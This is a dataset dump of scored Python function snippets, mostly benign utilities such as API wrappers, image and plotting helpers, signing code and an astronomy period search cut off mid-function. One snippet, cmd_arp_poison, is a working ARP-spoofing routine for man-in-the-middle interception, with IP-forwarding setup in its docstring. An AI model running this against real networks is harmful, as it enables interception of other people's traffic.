text (string, lengths 78 to 104k) | score (float64, 0 to 0.18) |
---|---|
def get_event_questions(self, id, **data):
"""
GET /events/:id/questions/
Eventbrite allows event organizers to add custom questions that attendees fill
out upon registration. This endpoint can be helpful for determining what
custom information is collected and available per event.
This endpoint will return :format:`question`.
"""
return self.get("/events/{0}/questions/".format(id), data=data) | 0.010661 |
def vflip(img):
"""Vertically flip the given PIL Image.
Args:
img (PIL Image): Image to be flipped.
Returns:
PIL Image: Vertically flipped image.
"""
if not _is_pil_image(img):
raise TypeError('img should be PIL Image. Got {}'.format(type(img)))
return img.transpose(Image.FLIP_TOP_BOTTOM) | 0.002933 |
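A minimal usage sketch for the snippet above, assuming Pillow is installed and that `vflip` (together with its `_is_pil_image` helper) is in scope:
from PIL import Image

img = Image.new('RGB', (4, 2), color=(255, 0, 0))  # tiny in-memory test image
flipped = vflip(img)
print(flipped.size)  # (4, 2) -- flipping reverses the rows, the size is unchanged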
def _load_tags(self,directory):
"""Loads tags from tag file and return
as flickr api compatible string
"""
#FIXME: should check if DB tracking file before using it
# --- Read tags out of file
_tags=''
try:
fullfile=os.path.join(directory,TAG_FILE)
ltags=open(fullfile).readline().split(',')
_tags=''' '''
for tag in ltags:
_tags+='''"'''+tag.strip()+'''" '''
_tags=_tags.strip()
except (IOError, OSError):
logger.info("No tags found in %s"%(directory))
return _tags | 0.021382 |
def init_region_config(self, region):
"""
Initialize the region's configuration
:param region: Name of the region
"""
self.regions[region] = self.region_config_class(region_name = region, resource_types = self.resource_types) | 0.024735 |
def scale(self, image, geometry, upscale, crop):
"""
Given an image, scales the image down (or up, if ``upscale`` equates
to a boolean ``True``).
:param Image image: This is your engine's ``Image`` object. For
PIL it's PIL.Image.
:param tuple geometry: Geometry of the image in the format of (x,y).
:param bool upscale: Whether the image may also be scaled up when it is
smaller than ``geometry``.
:param bool crop: If True, use the larger of the two axis factors so the
result covers ``geometry`` (for cropping); otherwise use the smaller one
so it fits inside.
:returns: The scaled image. The returned type depends on your
choice of Engine.
"""
x_image, y_image = map(float, self.get_image_size(image))
# Calculate scaling factor.
factors = (geometry[0] / x_image, geometry[1] / y_image)
factor = max(factors) if crop else min(factors)
if factor < 1 or upscale:
width = toint(x_image * factor)
height = toint(y_image * factor)
image = self._scale(image, width, height)
return image | 0.002257 |
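The factor selection above is easiest to see with concrete numbers; a self-contained arithmetic sketch (no thumbnail engine required):
# 800x600 source image, requested geometry 400x400
x_image, y_image = 800.0, 600.0
geometry = (400, 400)
factors = (geometry[0] / x_image, geometry[1] / y_image)  # (0.5, 0.666...)
print(min(factors))  # 0.5    -> crop=False: fit inside the box, giving 400x300
print(max(factors))  # ~0.667 -> crop=True: cover the box, giving ~533x400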
def add_tasks_to_remote(self, pid, path='C:/TDDOWNLOAD/', task_list=[]):
'''
post data:
{
"path":"C:/TDDOWNLOAD/",
"tasks":[{
"url":"ed2k://|file|%E6%B0%B8%E6%81%92.Forever...",
"name":"永恒.Forever.S01E02.中英字幕.WEB-HR.mkv",
"gcid":"",
"cid":"",
"filesize":512807020
}]
}
return data:
{
"tasks": [{
"name": "\u6c38\u6052.Fore76.x264.mkv",
"url": "ed2k://|file|%E6%B0%B8%E6%81%92",
"result": 202,
"taskid": "48",
"msg": "repeate_taskid:48",
"id": 1
}],
"rtn": 0
}
'''
if len(task_list) == 0:
return []
params = {
'pid': pid,
'v': DEFAULT_V,
'ct': DEFAULT_CT,
}
data = {
'path': path,
'tasks': task_list
}
headers = {
'Content-Type': 'application/x-www-form-urlencoded'
}
data = json.dumps(data)
data = quote(data)
data = 'json=' + data
res = self._post(
'createTask',
params=params,
data=data,
headers=headers
)
return res | 0.001456 |
def getSiblings(self, retracted=False):
"""
Returns the list of analyses of the Analysis Request to which this
analysis belongs to, but with the current analysis excluded.
:param retracted: If false, retracted/rejected siblings are dismissed
:type retracted: bool
:return: list of siblings for this analysis
:rtype: list of IAnalysis
"""
request = self.getRequest()
if not request:
return []
siblings = []
retracted_states = [STATE_RETRACTED, STATE_REJECTED]
for sibling in request.getAnalyses(full_objects=True):
if api.get_uid(sibling) == self.UID():
# Exclude me from the list
continue
if not retracted:
if api.get_workflow_status_of(sibling) in retracted_states:
# Exclude retracted analyses
continue
siblings.append(sibling)
return siblings | 0.002006 |
def _init_axes(self, data, method='plot',
xscale=None, sharex=False, sharey=False,
geometry=None, separate=None, **kwargs):
"""Populate this figure with data, creating `Axes` as necessary
"""
if isinstance(sharex, bool):
sharex = "all" if sharex else "none"
if isinstance(sharey, bool):
sharey = "all" if sharey else "none"
# parse keywords
axes_kw = {key: kwargs.pop(key) for key in utils.AXES_PARAMS if
key in kwargs}
# handle geometry and group axes
if geometry is not None and geometry[0] * geometry[1] == len(data):
separate = True
axes_groups = _group_axes_data(data, separate=separate)
if geometry is None:
geometry = (len(axes_groups), 1)
nrows, ncols = geometry
if axes_groups and nrows * ncols != len(axes_groups):
# mismatching data and geometry
raise ValueError("cannot group data into {0} axes with a "
"{1}x{2} grid".format(len(axes_groups), nrows,
ncols))
# create grid spec
gs = GridSpec(nrows, ncols)
axarr = numpy.empty((nrows, ncols), dtype=object)
# set default labels
defxlabel = 'xlabel' not in axes_kw
defylabel = 'ylabel' not in axes_kw
flatdata = [s for group in axes_groups for s in group]
for axis in ('x', 'y'):
unit = _common_axis_unit(flatdata, axis=axis)
if unit:
axes_kw.setdefault('{}label'.format(axis),
unit.to_string('latex_inline_dimensional'))
# create axes for each group and draw each data object
for group, (row, col) in zip_longest(
axes_groups, itertools.product(range(nrows), range(ncols)),
fillvalue=[]):
# create Axes
shared_with = {"none": None, "all": axarr[0, 0],
"row": axarr[row, 0], "col": axarr[0, col]}
axes_kw["sharex"] = shared_with[sharex]
axes_kw["sharey"] = shared_with[sharey]
axes_kw['xscale'] = xscale if xscale else _parse_xscale(group)
ax = axarr[row, col] = self.add_subplot(gs[row, col], **axes_kw)
# plot data
plot_func = getattr(ax, method)
if method in ('imshow', 'pcolormesh'):
for obj in group:
plot_func(obj, **kwargs)
elif group:
plot_func(*group, **kwargs)
# set default axis labels
for axis, share, pos, n, def_ in (
(ax.xaxis, sharex, row, nrows, defxlabel),
(ax.yaxis, sharey, col, ncols, defylabel),
):
# hide label if shared axis and not bottom left panel
if share == 'all' and pos < n - 1:
axis.set_label_text('')
# otherwise set default status
else:
axis.isDefault_label = def_
return self.axes | 0.001265 |
def worker(work_unit):
'''Expects a WorkUnit from coordinated, obtains a config, and runs
traverse_extract_fetch
'''
if 'config' not in work_unit.spec:
raise coordinate.exceptions.ProgrammerError(
'could not run extraction without global config')
web_conf = Config()
unitconf = work_unit.spec['config']
#logger.info(unitconf)
with yakonfig.defaulted_config([coordinate, kvlayer, dblogger, web_conf],
config=unitconf):
traverse_extract_fetch(web_conf, work_unit.key) | 0.003559 |
def start(self):
''' Starts the server. '''
self._app.run(host=self._host, port=self._port) | 0.018692 |
def getScalars(self, inputData):
"""
Returns a numpy array containing the sub-field scalar value(s) for
each sub-field of the ``inputData``. To get the associated field names for
each of the scalar values, call :meth:`.getScalarNames()`.
For a simple scalar encoder, the scalar value is simply the input unmodified.
For category encoders, it is the scalar representing the category string
that is passed in. For the datetime encoder, the scalar value is the
number of seconds since epoch.
The intent of the scalar representation of a sub-field is to provide a
baseline for measuring error differences. You can compare the scalar value
of the inputData with the scalar value returned from :meth:`.topDownCompute`
on a top-down representation to evaluate prediction accuracy, for example.
:param inputData: The data from the source. This is typically an object with
members
:return: array of scalar values
"""
retVals = numpy.array([])
if self.encoders is not None:
for (name, encoder, offset) in self.encoders:
values = encoder.getScalars(self._getInputValue(inputData, name))
retVals = numpy.hstack((retVals, values))
else:
retVals = numpy.hstack((retVals, inputData))
return retVals | 0.004566 |
def insort_no_dup(lst, item):
"""
If item is not in lst, add item to list at its sorted position
"""
import bisect
ix = bisect.bisect_left(lst, item)
if ix == len(lst) or lst[ix] != item:
lst[ix:ix] = [item] | 0.009009 |
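A short usage sketch, assuming the `insort_no_dup` above (with the end-of-list guard) is in scope:
lst = [1, 3, 5]
insort_no_dup(lst, 4)   # inserted at its sorted position
insort_no_dup(lst, 4)   # duplicate -> list left unchanged
insort_no_dup(lst, 9)   # larger than everything -> appended (the length guard matters here)
print(lst)              # [1, 3, 4, 5, 9]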
def process_gauge(self, key, fields):
"""
Process a received gauge event
:param key: Key of timer
:param fields: Received fields
"""
try:
self.gauges[key] = float(fields[0])
if self.stats_seen >= maxint:
self.logger.info("hit maxint, reset seen counter")
self.stats_seen = 0
self.stats_seen += 1
except Exception as err:
self.logger.info("error decoding gauge event: %s" % err)
if self.debug:
print "error decoding gauge event: %s" % err | 0.003322 |
def cmd_arp_poison(victim1, victim2, iface, verbose):
"""Send ARP 'is-at' packets to each victim, poisoning their
ARP tables so that their traffic is sent to your system.
Note: If you want a full working Man In The Middle attack, you need
to enable the packet forwarding on your operating system to act like a
router. You can do that using:
# echo 1 > /proc/sys/net/ipv4/ip_forward
Example:
\b
# habu.arpoison 192.168.0.1 192.168.0.77
Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77
Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.70
Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77
...
"""
conf.verb = False
if iface:
conf.iface = iface
mac1 = getmacbyip(victim1)
mac2 = getmacbyip(victim2)
pkt1 = Ether(dst=mac1)/ARP(op="is-at", psrc=victim2, pdst=victim1, hwdst=mac1)
pkt2 = Ether(dst=mac2)/ARP(op="is-at", psrc=victim1, pdst=victim2, hwdst=mac2)
try:
while 1:
sendp(pkt1)
sendp(pkt2)
if verbose:
pkt1.show2()
pkt2.show2()
else:
print(pkt1.summary())
print(pkt2.summary())
time.sleep(1)
except KeyboardInterrupt:
pass | 0.002357 |
def create_signature(key_dict, data):
"""
<Purpose>
Return a signature dictionary of the form:
{'keyid': 'f30a0870d026980100c0573bd557394f8c1bbd6...',
'sig': '...'}.
The signing process will use the private key in
key_dict['keyval']['private'] and 'data' to generate the signature.
The following signature schemes are supported:
'RSASSA-PSS'
RFC3447 - RSASSA-PSS
http://www.ietf.org/rfc/rfc3447.
'ed25519'
ed25519 - high-speed high security signatures
http://ed25519.cr.yp.to/
Which signature to generate is determined by the key type of 'key_dict'
and the available cryptography library specified in 'settings'.
>>> ed25519_key = generate_ed25519_key()
>>> data = 'The quick brown fox jumps over the lazy dog'
>>> signature = create_signature(ed25519_key, data)
>>> securesystemslib.formats.SIGNATURE_SCHEMA.matches(signature)
True
>>> len(signature['sig'])
128
>>> rsa_key = generate_rsa_key(2048)
>>> signature = create_signature(rsa_key, data)
>>> securesystemslib.formats.SIGNATURE_SCHEMA.matches(signature)
True
>>> ecdsa_key = generate_ecdsa_key()
>>> signature = create_signature(ecdsa_key, data)
>>> securesystemslib.formats.SIGNATURE_SCHEMA.matches(signature)
True
<Arguments>
key_dict:
A dictionary containing the keys. An example RSA key dict has the
form:
{'keytype': 'rsa',
'scheme': 'rsassa-pss-sha256',
'keyid': 'f30a0870d026980100c0573bd557394f8c1bbd6...',
'keyval': {'public': '-----BEGIN RSA PUBLIC KEY----- ...',
'private': '-----BEGIN RSA PRIVATE KEY----- ...'}}
The public and private keys are strings in PEM format.
data:
Data to be signed. This should be a bytes object; data should be
encoded/serialized before it is passed here. The same value can be
passed into securesystemslib.verify_signature() (along with the public
key) to later verify the signature.
<Exceptions>
securesystemslib.exceptions.FormatError, if 'key_dict' is improperly
formatted.
securesystemslib.exceptions.UnsupportedAlgorithmError, if 'key_dict'
specifies an unsupported key type or signing scheme.
TypeError, if 'key_dict' contains an invalid keytype.
<Side Effects>
The cryptography library specified in 'settings' is called to perform the
actual signing routine.
<Returns>
A signature dictionary conformant to
'securesystemslib_format.SIGNATURE_SCHEMA'.
"""
# Does 'key_dict' have the correct format?
# This check will ensure 'key_dict' has the appropriate number of objects
# and object types, and that all dict keys are properly named.
# Raise 'securesystemslib.exceptions.FormatError' if the check fails.
# The key type of 'key_dict' must be either 'rsa' or 'ed25519'.
securesystemslib.formats.ANYKEY_SCHEMA.check_match(key_dict)
# Signing the 'data' object requires a private key. 'rsassa-pss-sha256',
# 'ed25519', and 'ecdsa-sha2-nistp256' are the only signing schemes currently
# supported. RSASSA-PSS keys and signatures can be generated and verified by
# pyca_crypto_keys.py, and Ed25519 keys by PyNaCl and PyCA's optimized, pure
# python implementation of Ed25519.
signature = {}
keytype = key_dict['keytype']
scheme = key_dict['scheme']
public = key_dict['keyval']['public']
private = key_dict['keyval']['private']
keyid = key_dict['keyid']
sig = None
if keytype == 'rsa':
if scheme == 'rsassa-pss-sha256':
private = private.replace('\r\n', '\n')
sig, scheme = securesystemslib.pyca_crypto_keys.create_rsa_signature(
private, data, scheme)
else:
raise securesystemslib.exceptions.UnsupportedAlgorithmError('Unsupported'
' RSA signature scheme specified: ' + repr(scheme))
elif keytype == 'ed25519':
public = binascii.unhexlify(public.encode('utf-8'))
private = binascii.unhexlify(private.encode('utf-8'))
sig, scheme = securesystemslib.ed25519_keys.create_signature(
public, private, data, scheme)
elif keytype == 'ecdsa-sha2-nistp256':
sig, scheme = securesystemslib.ecdsa_keys.create_signature(
public, private, data, scheme)
# 'securesystemslib.formats.ANYKEY_SCHEMA' should have detected invalid key
# types. This is a defensive check against an invalid key type.
else: # pragma: no cover
raise TypeError('Invalid key type.')
# Build the signature dictionary to be returned.
# The hexadecimal representation of 'sig' is stored in the signature.
signature['keyid'] = keyid
signature['sig'] = binascii.hexlify(sig).decode()
return signature | 0.007681 |
def sam_send(sock, line_and_data):
"""Send a line to the SAM controller, but don't read it"""
if isinstance(line_and_data, tuple):
line, data = line_and_data
else:
line, data = line_and_data, b''
line = bytes(line, encoding='ascii') + b' \n'
# print('-->', line, data)
sock.sendall(line + data) | 0.002985 |
def writeMultiByte(self, value, charset):
"""
Writes a multibyte string to the datastream using the
specified character set.
@type value: C{str}
@param value: The string value to be written.
@type charset: C{str}
@param charset: The string denoting the character set to use. Possible
character set strings include C{shift-jis}, C{cn-gb},
C{iso-8859-1} and others.
@see: U{Supported character sets on Livedocs (external)
<http://livedocs.adobe.com/flex/201/langref/charset-codes.html>}
"""
if type(value) is unicode:
value = value.encode(charset)
self.stream.write(value) | 0.002825 |
def build_search(self):
"""
Construct the ``Search`` object.
"""
s = self.search()
s = self.query(s, self._query)
s = self.filter(s)
if self.fields:
s = self.highlight(s)
s = self.sort(s)
self.aggregate(s)
return s | 0.006536 |
def get_mean_and_stddevs(self, sites, rup, dists, imt, stddev_types):
"""
See :meth:`superclass method
<.base.GroundShakingIntensityModel.get_mean_and_stddevs>`
for spec of input and result values.
"""
assert all(stddev_type in self.DEFINED_FOR_STANDARD_DEVIATION_TYPES
for stddev_type in stddev_types)
# GMPE differentiates strike-slip, reverse and normal ruptures,
# but combines normal and strike-slip into one category. See page 180.
is_reverse = (45 <= rup.rake <= 135)
stddevs = [numpy.zeros_like(sites.vs30) for _ in stddev_types]
means = numpy.zeros_like(sites.vs30)
[rocks_i] = (sites.vs30 > self.ROCK_VS30).nonzero()
if len(rocks_i):
rrup = dists.rrup.take(rocks_i)
mean_rock = self._get_mean_rock(rup.mag, rup.rake, rrup,
is_reverse, imt)
means.put(rocks_i, mean_rock)
for stddev_arr in stddevs:
stddev_rock = self._get_stddev_rock(rup.mag, imt)
stddev_arr.put(rocks_i, stddev_rock)
[soils_i] = (sites.vs30 <= self.ROCK_VS30).nonzero()
if len(soils_i):
rrup = dists.rrup.take(soils_i)
mean_soil = self._get_mean_deep_soil(rup.mag, rup.rake, rrup,
is_reverse, imt)
means.put(soils_i, mean_soil)
for stddev_arr in stddevs:
stddev_soil = self._get_stddev_deep_soil(rup.mag, imt)
stddev_arr.put(soils_i, stddev_soil)
return means, stddevs | 0.001212 |
def _preprocess_format(self):
"""
Preprocess the format_string attribute.
Splits the format string on each placeholder and returns a list of
tuples containing substring, placeholder name, and function
retrieving content for placeholder (getter).
Relevant placeholder functions (getters) are taken from the
'placeholders' attribute, which is a dict. If no matching placeholder
is found in 'placeholders', the getter is set to None. Getter and
placeholder are also always set to None in the first element of the
returned list, because it never contains a real placeholder (see the
re.split documentation for further information).
"""
format_split = re.split(r'(?<!\\)%', self.format_string)
preprocessed_format = []
for idx, substr in enumerate(format_split):
if idx == 0:
getter = None
placeholder = None
else:
pattern = MAIN_PATTERN.format(ph=r'\S')
try:
placeholder = re.match(pattern, substr).group('placeholder').strip('[]')
except AttributeError:
placeholder = None
if placeholder == 'S':
self.one_line = True
try:
getter = self.placeholders[placeholder]
except KeyError:
getter = None
substr = re.sub(pattern, '', substr)
format_elem = (substr, placeholder, getter)
preprocessed_format.append(format_elem)
return preprocessed_format | 0.001818 |
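The negative-lookbehind split is the core trick above; a standalone illustration of how a format string is cut at unescaped '%' signs:
import re

print(re.split(r'(?<!\\)%', 'Author: %a committed on %d'))
# ['Author: ', 'a committed on ', 'd']  -> element 0 never carries a placeholder
print(re.split(r'(?<!\\)%', r'100\% done on %d'))
# ['100\\% done on ', 'd']              -> the escaped percent sign is left alone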
def fetch_exemplars(keyword, outfile, n=50):
""" Fetch top lists matching this keyword, then return Twitter screen
names along with the number of different lists on which each appears. """
list_urls = fetch_lists(keyword, n)
print('found %d lists for %s' % (len(list_urls), keyword))
counts = Counter()
for list_url in list_urls:
counts.update(fetch_list_members(list_url))
# Write to file.
outf = io.open(outfile, 'wt')
for handle in sorted(counts):
outf.write('%s\t%d\n' % (handle, counts[handle]))
outf.close()
print('saved exemplars to', outfile) | 0.001639 |
def set_secondary_vehicle_position(self, m):
'''store second vehicle position for filtering purposes'''
if m.get_type() != 'GLOBAL_POSITION_INT':
return
(lat, lon, heading) = (m.lat*1.0e-7, m.lon*1.0e-7, m.hdg*0.01)
if abs(lat) < 1.0e-3 and abs(lon) < 1.0e-3:
return
self.vehicle2_pos = VehiclePos(m) | 0.005495 |
def execute_cmd(self, *args, **kwargs):
"""Execute a given hpssacli/ssacli command on the controller.
This method executes a given command on the controller.
:params args: a tuple consisting of sub-commands to be appended
after specifying the controller in hpssacli/ssacli command.
:param kwargs: kwargs to be passed to execute() in processutils
:raises: HPSSAOperationError, if hpssacli/ssacli operation failed.
"""
slot = self.properties['Slot']
base_cmd = ("controller", "slot=%s" % slot)
cmd = base_cmd + args
return _ssacli(*cmd, **kwargs) | 0.003135 |
def generate_batch(cls, strategy, size, **kwargs):
"""Generate a batch of instances.
The instances will be created with the given strategy (one of
BUILD_STRATEGY, CREATE_STRATEGY, STUB_STRATEGY).
Args:
strategy (str): the strategy to use for generating the instance.
size (int): the number of instances to generate
Returns:
object list: the generated instances
"""
assert strategy in (enums.STUB_STRATEGY, enums.BUILD_STRATEGY, enums.CREATE_STRATEGY)
batch_action = getattr(cls, '%s_batch' % strategy)
return batch_action(size, **kwargs) | 0.00463 |
def hosts_to_endpoints(hosts, port=2181):
"""
return a list of (host, port) tuples from a given host[:port],... str
"""
endpoints = []
for host in hosts.split(","):
endpoints.append(tuple(host.rsplit(":", 1)) if ":" in host else (host, port))
return endpoints | 0.006873 |
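A quick usage sketch (hostnames are made up); note that an explicitly given port stays a string while the default port is an int:
print(hosts_to_endpoints("zk1.example.com:2182,zk2.example.com,10.0.0.5"))
# [('zk1.example.com', '2182'), ('zk2.example.com', 2181), ('10.0.0.5', 2181)]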
def bls_parallel_pfind(
times, mags, errs,
magsarefluxes=False,
startp=0.1, # by default, search from 0.1 d to...
endp=100.0, # ... 100.0 d -- don't search full timebase
stepsize=1.0e-4,
mintransitduration=0.01, # minimum transit length in phase
maxtransitduration=0.4, # maximum transit length in phase
ndurations=100,
autofreq=True, # figure out f0, nf, and df automatically
blsobjective='likelihood',
blsmethod='fast',
blsoversample=5,
blsmintransits=3,
blsfreqfactor=10.0,
nbestpeaks=5,
periodepsilon=0.1, # 0.1
sigclip=10.0,
verbose=True,
nworkers=None,
):
'''Runs the Box Least Squares Fitting Search for transit-shaped signals.
Breaks up the full frequency space into chunks and passes them to parallel
BLS workers.
Based on the version of BLS in Astropy 3.1:
`astropy.stats.BoxLeastSquares`. If you don't have Astropy 3.1, this module
will fail to import. Note that by default, this implementation of
`bls_parallel_pfind` doesn't use the `.autoperiod()` function from
`BoxLeastSquares` but uses the same auto frequency-grid generation as the
functions in `periodbase.kbls`. If you want to use Astropy's implementation,
set the value of `autofreq` kwarg to 'astropy'. The generated period array
will then be broken up into chunks and sent to the individual workers.
NOTE: the combined BLS spectrum produced by this function is not identical
to that produced by running BLS in one shot for the entire frequency
space. There are differences on the order of 1.0e-3 or so in the respective
peak values, but peaks appear at the same frequencies for both methods. This
is likely due to different aliasing caused by smaller chunks of the
frequency space used by the parallel workers in this function. When in
doubt, confirm results for this parallel implementation by comparing to
those from the serial implementation above.
In particular, when you want to get reliable estimates of the SNR, transit
depth, duration, etc. that Astropy's BLS gives you, rerun `bls_serial_pfind`
with `startp`, and `endp` close to the best period you want to characterize
the transit at. The dict returned from that function contains a `blsmodel`
key, which is the generated model from Astropy's BLS. Use the
`.compute_stats()` method to calculate the required stats.
Parameters
----------
times,mags,errs : np.array
The magnitude/flux time-series to search for transits.
magsarefluxes : bool
If the input measurement values in `mags` and `errs` are in fluxes, set
this to True.
startp,endp : float
The minimum and maximum periods to consider for the transit search.
stepsize : float
The step-size in frequency to use when constructing a frequency grid for
the period search.
mintransitduration,maxtransitduration : float
The minimum and maximum transitdurations (in units of phase) to consider
for the transit search.
ndurations : int
The number of transit durations to use in the period-search.
autofreq : bool or str
If this is True, the values of `stepsize` and `nphasebins` will be
ignored, and these, along with a frequency-grid, will be determined
based on the following relations::
nphasebins = int(ceil(2.0/mintransitduration))
if nphasebins > 3000:
nphasebins = 3000
stepsize = 0.25*mintransitduration/(times.max()-times.min())
minfreq = 1.0/endp
maxfreq = 1.0/startp
nfreq = int(ceil((maxfreq - minfreq)/stepsize))
If this is False, you must set `startp`, `endp`, and `stepsize` as
appropriate.
If this is str == 'astropy', will use the
`astropy.stats.BoxLeastSquares.autoperiod()` function to calculate the
frequency grid instead of the kbls method.
blsobjective : {'likelihood','snr'}
Sets the type of objective to optimize in the `BoxLeastSquares.power()`
function.
blsmethod : {'fast','slow'}
Sets the type of method to use in the `BoxLeastSquares.power()`
function.
blsoversample : {'likelihood','snr'}
Sets the `oversample` kwarg for the `BoxLeastSquares.power()` function.
blsmintransits : int
Sets the `min_n_transits` kwarg for the `BoxLeastSquares.autoperiod()`
function.
blsfreqfactor : float
Sets the `frequency_factor` kwarg for the `BoxLeastSquares.autoperiod()`
function.
periodepsilon : float
The fractional difference between successive values of 'best' periods
when sorting by periodogram power to consider them as separate periods
(as opposed to part of the same periodogram peak). This is used to avoid
broad peaks in the periodogram and make sure the 'best' periods returned
are all actually independent.
nbestpeaks : int
The number of 'best' peaks to return from the periodogram results,
starting from the global maximum of the periodogram peak values.
sigclip : float or int or sequence of two floats/ints or None
If a single float or int, a symmetric sigma-clip will be performed using
the number provided as the sigma-multiplier to cut out from the input
time-series.
If a list of two ints/floats is provided, the function will perform an
'asymmetric' sigma-clip. The first element in this list is the sigma
value to use for fainter flux/mag values; the second element in this
list is the sigma value to use for brighter flux/mag values. For
example, `sigclip=[10., 3.]`, will sigclip out greater than 10-sigma
dimmings and greater than 3-sigma brightenings. Here the meaning of
"dimming" and "brightening" is set by *physics* (not the magnitude
system), which is why the `magsarefluxes` kwarg must be correctly set.
If `sigclip` is None, no sigma-clipping will be performed, and the
time-series (with non-finite elems removed) will be passed through to
the output.
verbose : bool
If this is True, will indicate progress and details about the frequency
grid used for the period search.
nworkers : int or None
The number of parallel workers to launch for period-search. If None,
nworkers = NCPUS.
Returns
-------
dict
This function returns a dict, referred to as an `lspinfo` dict in other
astrobase functions that operate on periodogram results. This is a
standardized format across all astrobase period-finders, and is of the
form below::
{'bestperiod': the best period value in the periodogram,
'bestlspval': the periodogram peak associated with the best period,
'nbestpeaks': the input value of nbestpeaks,
'nbestlspvals': nbestpeaks-size list of best period peak values,
'nbestperiods': nbestpeaks-size list of best periods,
'lspvals': the full array of periodogram powers,
'frequencies': the full array of frequencies considered,
'periods': the full array of periods considered,
'durations': the array of durations used to run BLS,
'blsresult': Astropy BLS result object (BoxLeastSquaresResult),
'blsmodel': Astropy BLS BoxLeastSquares object used for work,
'stepsize': the actual stepsize used,
'nfreq': the actual nfreq used,
'durations': the durations array used,
'mintransitduration': the input mintransitduration,
'maxtransitduration': the input maxtransitdurations,
'method':'bls' -> the name of the period-finder method,
'kwargs':{ dict of all of the input kwargs for record-keeping}}
'''
# get rid of nans first and sigclip
stimes, smags, serrs = sigclip_magseries(times,
mags,
errs,
magsarefluxes=magsarefluxes,
sigclip=sigclip)
# make sure there are enough points to calculate a spectrum
if len(stimes) > 9 and len(smags) > 9 and len(serrs) > 9:
# if we're setting up everything automatically
if isinstance(autofreq, bool) and autofreq:
# use heuristic to figure out best timestep
stepsize = 0.25*mintransitduration/(stimes.max()-stimes.min())
# now figure out the frequencies to use
minfreq = 1.0/endp
maxfreq = 1.0/startp
nfreq = int(npceil((maxfreq - minfreq)/stepsize))
# say what we're using
if verbose:
LOGINFO('min P: %s, max P: %s, nfreq: %s, '
'minfreq: %s, maxfreq: %s' % (startp, endp, nfreq,
minfreq, maxfreq))
LOGINFO('autofreq = True: using AUTOMATIC values for '
'freq stepsize: %s, ndurations: %s, '
'min transit duration: %s, max transit duration: %s' %
(stepsize, ndurations,
mintransitduration, maxtransitduration))
use_autoperiod = False
elif isinstance(autofreq, bool) and not autofreq:
minfreq = 1.0/endp
maxfreq = 1.0/startp
nfreq = int(npceil((maxfreq - minfreq)/stepsize))
# say what we're using
if verbose:
LOGINFO('min P: %s, max P: %s, nfreq: %s, '
'minfreq: %s, maxfreq: %s' % (startp, endp, nfreq,
minfreq, maxfreq))
LOGINFO('autofreq = False: using PROVIDED values for '
'freq stepsize: %s, ndurations: %s, '
'min transit duration: %s, max transit duration: %s' %
(stepsize, ndurations,
mintransitduration, maxtransitduration))
use_autoperiod = False
elif isinstance(autofreq, str) and autofreq == 'astropy':
use_autoperiod = True
minfreq = 1.0/endp
maxfreq = 1.0/startp
else:
LOGERROR("unknown autofreq kwarg encountered. can't continue...")
return None
# check the minimum frequency
if minfreq < (1.0/(stimes.max() - stimes.min())):
minfreq = 2.0/(stimes.max() - stimes.min())
if verbose:
LOGWARNING('the requested max P = %.3f is larger than '
'the time base of the observations = %.3f, '
' will make minfreq = 2 x 1/timebase'
% (endp, stimes.max() - stimes.min()))
LOGINFO('new minfreq: %s, maxfreq: %s' %
(minfreq, maxfreq))
#############################
## NOW RUN BLS IN PARALLEL ##
#############################
# fix number of CPUs if needed
if not nworkers or nworkers > NCPUS:
nworkers = NCPUS
if verbose:
LOGINFO('using %s workers...' % nworkers)
# check if autoperiod is True and get the correct period-grid
if use_autoperiod:
# astropy's BLS requires durations in units of time
durations = nplinspace(mintransitduration*startp,
maxtransitduration*startp,
ndurations)
# set up the correct units for the BLS model
if magsarefluxes:
blsmodel = BoxLeastSquares(
stimes*u.day,
smags*u.dimensionless_unscaled,
dy=serrs*u.dimensionless_unscaled
)
else:
blsmodel = BoxLeastSquares(
stimes*u.day,
smags*u.mag,
dy=serrs*u.mag
)
periods = nparray(
blsmodel.autoperiod(
durations*u.day,
minimum_period=startp,
maximum_period=endp,
minimum_n_transit=blsmintransits,
frequency_factor=blsfreqfactor
)
)
frequencies = 1.0/periods
nfreq = frequencies.size
if verbose:
LOGINFO(
"autofreq = 'astropy', used .autoperiod() with "
"minimum_n_transit = %s, freq_factor = %s "
"to generate the frequency grid" %
(blsmintransits, blsfreqfactor)
)
LOGINFO('stepsize = %s, nfreq = %s, minfreq = %.5f, '
'maxfreq = %.5f, ndurations = %s' %
(abs(frequencies[1] - frequencies[0]),
nfreq,
1.0/periods.max(),
1.0/periods.min(),
durations.size))
del blsmodel
del durations
# otherwise, use kbls method
else:
frequencies = minfreq + nparange(nfreq)*stepsize
# break up the tasks into chunks
csrem = int(fmod(nfreq, nworkers))
csint = int(float(nfreq/nworkers))
chunk_minfreqs, chunk_nfreqs = [], []
for x in range(nworkers):
this_minfreqs = frequencies[x*csint]
# handle usual nfreqs
if x < (nworkers - 1):
this_nfreqs = frequencies[x*csint:x*csint+csint].size
else:
this_nfreqs = frequencies[x*csint:x*csint+csint+csrem].size
chunk_minfreqs.append(this_minfreqs)
chunk_nfreqs.append(this_nfreqs)
# populate the tasks list
#
# task[0] = times
# task[1] = mags
# task[2] = errs
# task[3] = magsarefluxes
# task[4] = minfreq
# task[5] = nfreq
# task[6] = stepsize
# task[7] = nphasebins
# task[8] = mintransitduration
# task[9] = maxtransitduration
# task[10] = blsobjective
# task[11] = blsmethod
# task[12] = blsoversample
# populate the tasks list
tasks = [(stimes, smags, serrs, magsarefluxes,
chunk_minf, chunk_nf, stepsize,
ndurations, mintransitduration, maxtransitduration,
blsobjective, blsmethod, blsoversample)
for (chunk_minf, chunk_nf)
in zip(chunk_minfreqs, chunk_nfreqs)]
if verbose:
for ind, task in enumerate(tasks):
LOGINFO('worker %s: minfreq = %.6f, nfreqs = %s' %
(ind+1, task[4], task[5]))
LOGINFO('running...')
# return tasks
# start the pool
pool = Pool(nworkers)
results = pool.map(_parallel_bls_worker, tasks)
pool.close()
pool.join()
del pool
# now concatenate the output lsp arrays
lsp = npconcatenate([x['power'] for x in results])
periods = 1.0/frequencies
# find the nbestpeaks for the periodogram: 1. sort the lsp array
# by highest value first 2. go down the values until we find
# five values that are separated by at least periodepsilon in
# period
# make sure to get only the finite peaks in the periodogram
# this is needed because BLS may produce infs for some peaks
finitepeakind = npisfinite(lsp)
finlsp = lsp[finitepeakind]
finperiods = periods[finitepeakind]
# make sure that finlsp has finite values before we work on it
try:
bestperiodind = npargmax(finlsp)
